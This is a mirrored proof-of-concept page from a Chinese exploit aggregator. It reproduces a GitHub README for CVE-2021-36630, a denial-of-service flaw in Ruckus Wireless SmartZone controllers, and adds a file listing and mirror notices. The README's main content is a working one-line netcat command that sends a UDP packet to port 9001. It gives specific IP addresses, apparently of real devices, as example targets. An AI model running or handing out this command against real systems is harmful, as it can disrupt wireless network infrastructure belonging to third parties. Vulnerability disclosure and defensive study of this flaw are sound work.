POC详情: 78e81ae82c17bbe1957696b1e71afbdac07d4d7b

来源
https://github.com/lixiang957/CVE-2021-36630
关联漏洞
标题: Ruckus Wireless SmartZone 安全漏洞 (CVE-2021-36630)
描述:Ruckus Wireless SmartZone是Ruckus公司的高性能WLAN控制器。 Ruckus Wireless SmartZone存在安全漏洞,该漏洞源于eAut模块中发现包含分布式拒绝服务攻击漏洞。攻击者利用该漏洞通过特制的请求执行拒绝服务攻击。
介绍
# CVE-2021-36630

The SmartZone series devices of Ruckus have security risks. After notifying the manufacturer, they actively organized technical personnel to conduct investigations. During this period, we also provided security suggestions and verification methods many times. On July 19, the company officially issued a safety announcement.

# send request

> Attack command: echo "" | nc -4u <ip:address> 9001
> 
> ipaddress example: 62.210.8.110?111.107.251.71(RuckusWireless SZ ip)
> 

# example
![test](./Images/img.png)


# Affected version
> SmartZone-100 - all
> all - Virtual SmartZone

# Reference link

> http://ruckus.com
> http://smartzone-100.com
> https://anquan.baidu.com/article/1434
文件快照

 [4.0K]  /data/pocs/78e81ae82c17bbe1957696b1e71afbdac07d4d7b
├── [4.0K]  Images
│   └── [ 59K]  img.png
└── [ 701]  README.md

1 directory, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。